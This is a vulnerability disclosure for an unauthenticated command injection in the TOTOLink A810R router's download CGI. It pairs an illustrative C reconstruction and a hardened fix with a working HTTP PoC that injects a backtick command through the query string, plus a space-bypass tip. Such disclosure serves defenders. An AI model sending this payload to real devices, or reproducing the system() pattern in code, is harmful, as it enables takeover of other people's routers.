TOTOLink A810R V4.1.2cu.5182_B20201026 has a command injection vulnerability

Overview

Description

1.Product Information:

TOTOLink A810R router, firmware V4.1.2cu.5182_B20201026, which was the latest version published by the vendor at the time of writing:

Figure 1 Update date of the latest version of the firmware

(The latest version on the official website)

2. Vulnerability details


TOTOLINK A810R V4.1.2cu.5182_B20201026 was discovered to contain a command injection vulnerability in the "Main" function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter.

Figure 2 Location of the vulnerability

The CGI reads the QUERY_STRING environment variable without any filtering, splices it into the format string echo QUERY_STRING:%s >/tmp/download, and executes the resulting command line through the shell. Because the query string is entirely attacker-controlled, any shell metacharacters it contains (backticks, $(...), ;, |, &, redirections) are interpreted by the shell, so an unauthenticated request to the CGI yields arbitrary command execution with the privileges of the web server process.
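The following C program is an added illustration written for this page; it is not the firmware's own code (the real binary was only seen in a disassembler, see Figure 2), and the function names build_download_command, has_shell_metachars and safe_record_query are made up here. It reconstructs the vulnerable pattern described above (format string plus system()), shows exactly what the shell sees for the PoC query string from section 3, and places a hardened version beside it that writes the same line with stdio so no character of the query string is ever interpreted by a shell.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Vulnerable pattern (illustrative reconstruction, not the firmware's code):
 * the raw QUERY_STRING is spliced into a shell command line. */
#define CMD_FMT "echo QUERY_STRING:%s >/tmp/download"

/* Build the command line the vulnerable CGI hands to the shell.
 * Returns the number of characters written (excluding NUL), or -1 on truncation. */
int build_download_command(const char *query_string, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, CMD_FMT, query_string);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* The bug, in the shape the text describes: system() runs /bin/sh -c <cmd>,
 * so backticks, $(...), ';', '|' and redirections in query_string execute
 * with the CGI's privileges. Never called here; shown only for reference. */
void vulnerable_handler(const char *query_string)
{
    char cmd[512];
    if (build_download_command(query_string, cmd, sizeof cmd) < 0)
        return;
    system(cmd);
}

/* Input check: does the string contain anything /bin/sh would interpret?
 * Returns 1 if so, 0 otherwise. Useful as a WAF/IDS rule, but on its own it
 * is a blocklist and should not be the only fix. */
int has_shell_metachars(const char *s)
{
    return strpbrk(s, "`$;|&<>()\n\r'\"\\") != NULL;
}

/* Hardened handler: produce the same "QUERY_STRING:<value>" line that the
 * original echo produced, but through stdio instead of a shell. The caller
 * opens the destination (e.g. fopen("/tmp/download", "w")). Returns 0 on
 * success, -1 on I/O failure. */
int safe_record_query(FILE *out, const char *query_string)
{
    if (fprintf(out, "QUERY_STRING:%s\n", query_string) < 0)
        return -1;
    return fflush(out) == 0 ? 0 : -1;
}

/* Stand-alone demo using the PoC query string from section 3. */
int main(void)
{
    const char *poc = "payload=`ls>../1.txt`";  /* constructed sample input */
    char cmd[512];

    if (build_download_command(poc, cmd, sizeof cmd) > 0)
        printf("shell would run : %s\n", cmd);
    printf("metacharacters  : %s\n",
           has_shell_metachars(poc) ? "yes, injection" : "none");
    safe_record_query(stdout, poc);  /* same line, no shell involved */
    return 0;
}
```

The design point is that escaping the query string before handing it to system() is the wrong fix: the file write never needed a shell at all, so the hardened path removes the shell entirely and the metacharacter check becomes a defence-in-depth signal rather than the security boundary.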

3. Reproducing the vulnerability and PoC

To reproduce the vulnerability:

  1. Boot the firmware with qemu-system (or run it on a physical device).
  2. Send the following PoC request. The whole query string is injected, so the parameter name (payload) is irrelevant; the shell evaluates the backtick expression and writes the output of ls to ../1.txt relative to the CGI's working directory. Note that QUERY_STRING reaches the CGI still URL-encoded, so a literal space cannot be used in the payload; the PoC avoids spaces entirely (ls>../1.txt), and ${IFS} can stand in for a space if one is needed.
GET /cgi-bin/downloadFlile.cgi?payload=`ls>../1.txt` HTTP/1.1
Host: 192.168.111.12
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Figure 3 PoC attack effect

Figure 4 PoC attack effect